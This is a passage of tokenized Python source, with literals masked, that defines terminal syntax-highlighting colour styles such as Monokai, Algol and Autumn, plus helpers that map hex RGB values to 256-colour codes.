'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> RE_RGB3 = re . compile ( r'<STR_LIT>' ) <EOL> RE_RGB6 = re . compile ( r'<STR_LIT>' ) <EOL> def rgb_to_ints ( rgb ) : <EOL> """<STR_LIT>""" <EOL> if len ( rgb ) == <NUM_LIT:6> : <EOL> return tuple ( [ int ( h , <NUM_LIT:16> ) for h in RE_RGB6 . split ( rgb ) [ <NUM_LIT:1> : <NUM_LIT:4> ] ] ) <EOL> else : <EOL> return tuple ( [ int ( h * <NUM_LIT:2> , <NUM_LIT:16> ) for h in RE_RGB3 . split ( rgb ) [ <NUM_LIT:1> : <NUM_LIT:4> ] ] ) <EOL> def rgb_to_256 ( rgb ) : <EOL> """<STR_LIT>""" <EOL> rgb = rgb . lstrip ( '<STR_LIT:#>' ) <EOL> if len ( rgb ) == <NUM_LIT:0> : <EOL> return '<STR_LIT:0>' , '<STR_LIT>' <EOL> incs = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> parts = rgb_to_ints ( rgb ) <EOL> res = [ ] <EOL> for part in parts : <EOL> i = <NUM_LIT:0> <EOL> while i < len ( incs ) - <NUM_LIT:1> : <EOL> s , b = incs [ i ] , incs [ i + <NUM_LIT:1> ] <EOL> if s <= part <= b : <EOL> s1 = abs ( s - part ) <EOL> b1 = abs ( b - part ) <EOL> if s1 < b1 : closest = s <EOL> else : closest = b <EOL> res . append ( closest ) <EOL> break <EOL> i += <NUM_LIT:1> <EOL> res = '<STR_LIT>' . join ( [ ( '<STR_LIT>' % i ) for i in res ] ) <EOL> equiv = RGB_256 [ res ] <EOL> return equiv , res <EOL> def color_style_names ( ) : <EOL> """<STR_LIT>""" <EOL> return STYLES . keys ( ) <EOL> def color_style ( style = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> if style in STYLES : <EOL> cmap = STYLES [ style ] <EOL> else : <EOL> warn ( '<STR_LIT>' . format ( style ) , <EOL> RuntimeWarning ) <EOL> cmap = DEFAULT_STYLE <EOL> return cmap <EOL> def _expand_style ( cmap ) : <EOL> """<STR_LIT>""" <EOL> for key , val in list ( cmap . items ( ) ) : <EOL> if key == '<STR_LIT>' : <EOL> continue <EOL> elif len ( val ) == <NUM_LIT:0> : <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT:1>' <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT:4>' <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT>' <EOL> cmap [ '<STR_LIT>' + key ] = val <EOL> else : <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT>' + val <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT>' + val <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT>' + val <EOL> cmap [ '<STR_LIT>' + key ] = val . replace ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> BW_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _expand_style ( BW_STYLE ) <EOL> DEFAULT_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> MONOKAI_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _expand_style ( MONOKAI_STYLE ) <EOL> ALGOL_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ALGOL_NU_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> AUTUMN_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 